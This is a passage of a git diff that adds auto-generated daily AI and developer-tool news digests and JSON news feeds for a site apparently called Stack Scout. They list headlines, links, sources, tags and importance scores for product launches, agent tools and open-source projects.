+ +--- + +## [Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'](https://x.com/jarredsumner/status/2060XXX) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: agent_tool + +> Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing. + +--- + +## [wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack](https://github.com/wolfSSL/wolfCOSE) +*Hacker News* | 30/05/2026 | Score: 0.94 +Tags: product_launch + +--- + +## [OpenAI Extends Codex Computer Use To Windows](https://www.digg.com/ai/24n5kcme) +*Digg AI* | Score: 0.94 +Tags: agent_tool + +--- + +## [Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data](https://www.digg.com/ai/hqutws0i) +*Digg AI* | Score: 0.94 +Tags: product_launch + +--- + +## [Kore: Binary File Format Optimized for Modern Data Systems (Open Source)](https://github.com/arunkatherashala/Kore) +*Hacker News* | 30/05/2026 | Score: 0.89 +Tags: open_source + +--- + +## [ChatGPT — Release Notes](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.) 
+*The Verge AI* | Score: 0.76 +Tags: tool_update + +--- + +## [Show HN: Open Envelope – an open schema for defining AI agent teams](https://openenvelope.org/docs/schema/) +*Hacker News* | 28/05/2026 | Score: 0.75 +Tags: agent_tool + +--- + diff --git a/data/digest-2026-05-31.md b/data/digest-2026-05-31.md new file mode 100644 index 0000000..a10904c --- /dev/null +++ b/data/digest-2026-05-31.md @@ -0,0 +1,11 @@ +# Stack Scout - AI News Digest +**2026-05-31** | 1 stories | Auto-generated from 98 archived stories + +--- + +## [Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal](https://github.com/marekkowalczyk/breathe-cli) +*Hacker News* | 30/05/2026 | Score: 0.77 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-06-01.md b/data/digest-2026-06-01.md new file mode 100644 index 0000000..11d154f --- /dev/null +++ b/data/digest-2026-06-01.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-01** | 5 stories | Auto-generated from 220 archived stories + +--- + +## [Nvidia announces new AI chip for personal computers](https://www.bbc.com/news/articles/crmp9mppvzro) +*Hacker News* | 01/06/2026 | Score: 1.00 +Tags: product_launch + +--- + +## [AI Agent Guidelines for CS336 at Stanford](https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md) +*Hacker News* | 01/06/2026 | Score: 0.91 +Tags: agent_tool + +--- + +## [OpenAI frontier models and Codex are now available on AWS](https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/) +*Hacker News* | 01/06/2026 | Score: 0.83 +Tags: product_launch + +--- + +## [Malicious npm packages detected across Red Hat Cloud Services](https://github.com/RedHatInsights/javascript-clients/issues/492) +*Hacker News* | 01/06/2026 | Score: 0.83 +Tags: cli_tool + +--- + +## [Movwin: My (Unpublished) TUI Framework](https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html) +*Hacker News* | 30/05/2026 | Score: 0.77 +Tags: developer_tool + +--- + diff --git 
a/data/digest-2026-06-02.md b/data/digest-2026-06-02.md new file mode 100644 index 0000000..9756289 --- /dev/null +++ b/data/digest-2026-06-02.md @@ -0,0 +1,29 @@ +# Stack Scout - AI News Digest +**2026-06-02** | 4 stories | Auto-generated from 241 archived stories + +--- + +## [Microsoft announces Scout, an autonomous AI agent built on OpenClaw](https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html) +*Hacker News* | 02/06/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Alphabet announces $80B equity capital raise to expand AI infra and compute](https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx) +*Hacker News* | 01/06/2026 | Score: 1.00 +Tags: product_launch + +--- + +## [HP re-releases classic computer science calculator: The HP-16C](https://hpcalcs.com/product/hp-16c-collectors-edition/) +*Hacker News* | 02/06/2026 | Score: 0.94 +Tags: product_launch + +--- + +## [Apple rejected my dictation app for using the accessibility API](https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/) +*Hacker News* | 02/06/2026 | Score: 0.86 +Tags: api_update + +--- + diff --git a/data/digest-2026-06-03.md b/data/digest-2026-06-03.md new file mode 100644 index 0000000..5dbd671 --- /dev/null +++ b/data/digest-2026-06-03.md @@ -0,0 +1,41 @@ +# Stack Scout - AI News Digest +**2026-06-03** | 6 stories | Auto-generated from 269 archived stories + +--- + +## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) +*Hacker News* | 03/06/2026 | Score: 0.82 +Tags: api_update, developer_tool + +--- + +## [Gooey: A GPU-accelerated UI framework for Zig](https://github.com/duanebester/gooey) +*Hacker News* | 03/06/2026 | Score: 0.94 +Tags: developer_tool + +--- + +## [Capstone – multi-platform, multi-architecture disassembly framework](https://www.capstone-engine.org/) 
+*Hacker News* | 03/06/2026 | Score: 0.94 +Tags: developer_tool + +--- + +## [Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers](https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai) +*Hacker News* | 03/06/2026 | Score: 0.89 +Tags: open_source + +--- + +## [Roku LT Operating System open source distribution](https://blog.roku.com/developer/roku-lt-os) +*Hacker News* | 03/06/2026 | Score: 0.86 +Tags: open_source + +--- + +## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) +*Hacker News* | 03/06/2026 | Score: 0.66 +Tags: open_source + +--- + diff --git a/data/digest-2026-06-04.md b/data/digest-2026-06-04.md new file mode 100644 index 0000000..0ee2879 --- /dev/null +++ b/data/digest-2026-06-04.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-04** | 5 stories | Auto-generated from 224 recent stories + +--- + +## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: open_source, developer_tool + +--- + +## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) +*Hacker News* | 03/06/2026 | Score: 0.56 +Tags: api_update, developer_tool + +--- + +## [Show HN: Open Terminal – A Bloomberg Style App for Research](https://tesseractanalytics.ai/) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: cli_tool + +--- + +## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) +*Hacker News* | 04/06/2026 | Score: 0.48 +Tags: tool_update + +--- + +## [Journey to JPEG XL: open-source experiments shaped the future of image 
coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) +*Hacker News* | 03/06/2026 | Score: 0.48 +Tags: open_source + +--- + diff --git a/data/digest-2026-06-05.md b/data/digest-2026-06-05.md new file mode 100644 index 0000000..7509375 --- /dev/null +++ b/data/digest-2026-06-05.md @@ -0,0 +1,35 @@ +# Stack Scout - AI News Digest +**2026-06-05** | 5 stories | Auto-generated from 186 recent stories + +--- + +## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) +*Hacker News* | 04/06/2026 | Score: 0.56 +Tags: open_source, developer_tool + +--- + +## [Open Code Review – An AI-powered code review CLI tool](https://github.com/alibaba/open-code-review) +*Hacker News* | 05/06/2026 | Score: 0.48 +Tags: cli_tool + +--- + +## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) +*Hacker News* | 04/06/2026 | Score: 0.48 +Tags: tool_update + +--- + +## [databow: a Rust CLI to query any database with an ADBC driver](https://columnar.tech/blog/introducing-databow//) +*Hacker News* | 03/06/2026 | Score: 0.48 +Tags: cli_tool + +--- + +## [Branchless Quicksort faster than std:sort and pdqsort with C and C++ API](https://tiki.li/blog/blqsort) +*Hacker News* | 02/06/2026 | Score: 0.48 +Tags: api_update + +--- + diff --git a/data/digest-2026-06-06.md b/data/digest-2026-06-06.md new file mode 100644 index 0000000..ac59722 --- /dev/null +++ b/data/digest-2026-06-06.md @@ -0,0 +1,5 @@ +# Stack Scout - AI News Digest +**2026-06-06** | 0 stories | Auto-generated from 138 recent stories + +--- + diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index f57652d..0f23911 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-04", - 
"updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/news-feed-2026-03-15.json b/data/news-feed-2026-03-15.json new file mode 100644 index 0000000..86e7524 --- /dev/null +++ b/data/news-feed-2026-03-15.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:28.529Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-15", + "article_count": 3, + "archived_story_count": 55, + "articles": [ + { + "title": "Show HN: Open-source playground to red-team AI agents with exploits published", + "url": "https://github.com/fabraix/playground", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8799999999999999, + "date": "2026-03-15T22:29:46.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Chrome DevTools MCP (2025)", + "url": "https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session", + "source": "Hacker News", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.81, + "date": "2026-03-15T19:12:53.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Office.eu launches as Europe's sovereign office platform", + "url": "https://office.eu/media/pressrelease-20260304", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.7599999999999999, + "date": "2026-03-15T18:22:36.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-16.json b/data/news-feed-2026-03-16.json new file mode 100644 index 0000000..f7b30f3 --- /dev/null +++ b/data/news-feed-2026-03-16.json @@ -0,0 
+1,134 @@ +{ + "generated": "2026-06-05T00:44:28.694Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-16", + "article_count": 8, + "archived_story_count": 67, + "articles": [ + { + "title": "Apideck CLI – An AI-agent interface with much lower context consumption than MCP", + "url": "https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative", + "source": "Hacker News", + "tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-03-16T15:25:36.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Speed at the cost of quality: Study of use of Cursor AI in open source projects", + "url": "https://arxiv.org/abs/2511.04427", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.87, + "date": "2026-03-16T17:07:37.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nvidia Launches Vera CPU, Purpose-Built for Agentic AI", + "url": "https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.84, + "date": "2026-03-16T20:01:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nango (YC W23, API Access for Agents and Apps) Is Hiring", + "url": "https://jobs.ashbyhq.com/Nango", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.82, + "date": "2026-03-16T12:03:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "SpiceCrypt: A Python library for decrypting LTspice encrypted model files", + "url": "https://github.com/jtsylve/spice-crypt", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + 
"importance": 0.7599999999999999, + "date": "2026-03-15T07:11:32.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Event Publisher enables event integration between Keycloak and OpenFGA", + "url": "https://github.com/embesozzi/keycloak-openfga-event-publisher", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-16T14:21:07.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Lazycut: A simple terminal video trimmer using FFmpeg", + "url": "https://github.com/emin-ozata/lazycut", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-16T12:05:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Leanstral: Open-source agent for trustworthy coding and formal proof engineering", + "url": "https://mistral.ai/news/leanstral", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-16T20:59:40.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-17.json b/data/news-feed-2026-03-17.json new file mode 100644 index 0000000..56073d6 --- /dev/null +++ b/data/news-feed-2026-03-17.json @@ -0,0 +1,237 @@ +{ + "generated": "2026-06-05T00:44:28.931Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-17", + "article_count": 15, + "archived_story_count": 140, + "articles": [ + { + "title": "Show HN: Crust – A CLI framework for TypeScript and Bun", + "url": "https://github.com/chenxin-yan/crust", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-03-17T04:43:29.000Z", + "summary": null, + "category": 
"tech_general" + }, + { + "title": "World launches tool to verify humans behind AI shopping agents", + "url": "https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-17T15:00:00.000Z", + "summary": "As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce.", + "category": "ai_tools" + }, + { + "title": "Picsart now allows creators to ‘hire’ AI assistants through agent marketplace", + "url": "https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-17T04:01:00.000Z", + "summary": "Picsart's AI agent marketplace will launch with four agents, then add more agents each week.", + "category": "ai_tools" + }, + { + "title": "Nvidia’s version of OpenClaw could solve its biggest problem: security", + "url": "https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-16T22:45:51.000Z", + "summary": "Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw.", + "category": "ai_tools" + }, + { + "title": "How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect", + "url": "https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-16T17:51:46.000Z", + "summary": "GTC is 
Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI.", + "category": "ai_tools" + }, + { + "title": "China’s OpenClaw Boom Is a Gold Rush for AI Companies", + "url": "https://www.wired.com/story/china-is-going-all-in-on-openclaw/", + "source": "Wired AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.9099999999999999, + "date": "2026-03-13T12:00:00.000Z", + "summary": "Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies.", + "category": "ai_tools" + }, + { + "title": "Mistral AI Releases Forge", + "url": "https://mistral.ai/news/forge", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.79, + "date": "2026-03-17T21:04:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust", + "url": "https://github.com/peters/horizon", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.78, + "date": "2026-03-17T18:14:24.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Chrome extension adjusts video speed based on how fast the speaker is talking", + "url": "https://github.com/ywong137/speech-speed", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.78, + "date": "2026-03-13T06:18:17.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name", + "url": 
"https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/", + "source": "Ars Technica AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-02-13T19:40:21.000Z", + "summary": "This story has been retracted", + "category": "tech_general" + }, + { + "title": "Node.js needs a virtual file system", + "url": "https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-17T14:28:37.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Kagi Translate now supports LinkedIn Speak as an output language", + "url": "https://translate.kagi.com/?from=en&to=LinkedIn+speak", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-17T04:39:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Reverse-engineering Viktor and making it Open Source", + "url": "https://matijacniacki.com/blog/openviktor", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-17T08:15:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Building a Shell", + "url": "https://healeycodes.com/building-a-shell", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-17T09:52:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Droeftoeter, a Terminal Coding Toy", + "url": "https://github.com/whtspc/droeftoeter", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-13T04:16:26.000Z", + 
"summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-18.json b/data/news-feed-2026-03-18.json new file mode 100644 index 0000000..bceb1ea --- /dev/null +++ b/data/news-feed-2026-03-18.json @@ -0,0 +1,160 @@ +{ + "generated": "2026-06-05T00:44:29.089Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-18", + "article_count": 10, + "archived_story_count": 90, + "articles": [ + { + "title": "The leaderboard “you can’t game,” funded by the companies it ranks", + "url": "https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-18T16:30:00.000Z", + "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", + "category": "ai_tools" + }, + { + "title": "The PhD students who became the judges of the AI industry", + "url": "https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-18T15:00:00.000Z", + "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. 
In just seven months, the startup went from a UC Berkeley PhD research […]", + "category": "ai_tools" + }, + { + "title": "Meta is having trouble with rogue AI agents", + "url": "https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/", + "source": "TechCrunch AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.99, + "date": "2026-03-18T23:42:46.000Z", + "summary": "A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it.", + "category": "ai_tools" + }, + { + "title": "Launch an autonomous AI agent with sandboxed execution in 2 lines of code", + "url": "https://amaiya.github.io/onprem/examples_agent.html", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.98, + "date": "2026-03-18T01:10:19.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nightingale – open-source karaoke app that works with any song on your computer", + "url": "https://nightingale.cafe/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-18T08:06:24.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "A ngrok-style secure tunnel server written in Rust and Open Source", + "url": "https://github.com/joaoh82/rustunnel", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.71, + "date": "2026-03-18T14:00:43.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Tmux-IDE, OSS agent-first terminal IDE", + "url": "https://tmux.thijsverreck.com", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-18T17:46:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": 
"Show HN: Pgit – A Git-like CLI backed by PostgreSQL", + "url": "https://oseifert.ch/blog/building-pgit", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-17T06:11:17.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m", + "url": "https://huggingface.co/datasets/open-index/hacker-news", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.7, + "date": "2026-03-14T17:12:03.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Measuring progress toward AGI: A cognitive framework", + "url": "https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.61, + "date": "2026-03-18T11:44:44.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-19.json b/data/news-feed-2026-03-19.json new file mode 100644 index 0000000..d4b456d --- /dev/null +++ b/data/news-feed-2026-03-19.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:29.270Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-19", + "article_count": 5, + "archived_story_count": 98, + "articles": [ + { + "title": "Multiverse Computing pushes its compressed AI models into the mainstream", + "url": "https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/", + "source": "TechCrunch AI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-03-19T08:00:00.000Z", + "summary": "After compressing models from major AI labs, 
including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available.", + "category": "ai_tools" + }, + { + "title": "DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI", + "url": "https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9099999999999999, + "date": "2026-03-19T16:14:00.000Z", + "summary": "Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language.", + "category": "ai_tools" + }, + { + "title": "Hyper-optimized reverse geocoding API", + "url": "https://github.com/traccar/traccar-geocoder", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.7599999999999999, + "date": "2026-03-19T14:38:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Framework doesn't matter", + "url": "https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7599999999999999, + "date": "2026-03-14T22:14:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Cook: A simple CLI for orchestrating Claude Code", + "url": "https://rjcorwin.github.io/cook/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.6499999999999999, + "date": "2026-03-19T02:20:34.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-20.json b/data/news-feed-2026-03-20.json new 
file mode 100644 index 0000000..c4f0a1c --- /dev/null +++ b/data/news-feed-2026-03-20.json @@ -0,0 +1,102 @@ +{ + "generated": "2026-06-05T00:44:29.431Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-20", + "article_count": 6, + "archived_story_count": 82, + "articles": [ + { + "title": "OpenCode – Open source AI coding agent", + "url": "https://opencode.ai/", + "source": "Hacker News", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 0.76, + "date": "2026-03-20T21:03:52.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned", + "url": "https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/", + "source": "Wired AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-03-20T10:00:00.000Z", + "summary": "When social media is constantly pushing people to use AI, why not let AI agents participate?", + "category": "ai_tools" + }, + { + "title": "Trump’s AI framework targets state laws, shifts child safety burden to parents", + "url": "https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/", + "source": "TechCrunch AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9099999999999999, + "date": "2026-03-20T16:14:04.000Z", + "summary": "Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies.", + "category": "ai_tools" + }, + { + "title": "Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran", + "url": "https://github.com/FormerLab/fortransky", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + 
"matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T22:06:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost", + "url": "https://github.com/RasKrebs/sonar", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-20T09:59:56.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: An open-source safety net for home hemodialysis", + "url": "https://safehemo.com/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-17T00:48:15.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-21.json b/data/news-feed-2026-03-21.json new file mode 100644 index 0000000..c72119d --- /dev/null +++ b/data/news-feed-2026-03-21.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:29.597Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-21", + "article_count": 7, + "archived_story_count": 80, + "articles": [ + { + "title": "Apple Announces New Mac Sales Record Following MacBook Neo Launch", + "url": "https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-03-21T15:59:42.000Z", + "summary": null, + "category": "tech_general" + }, + { + 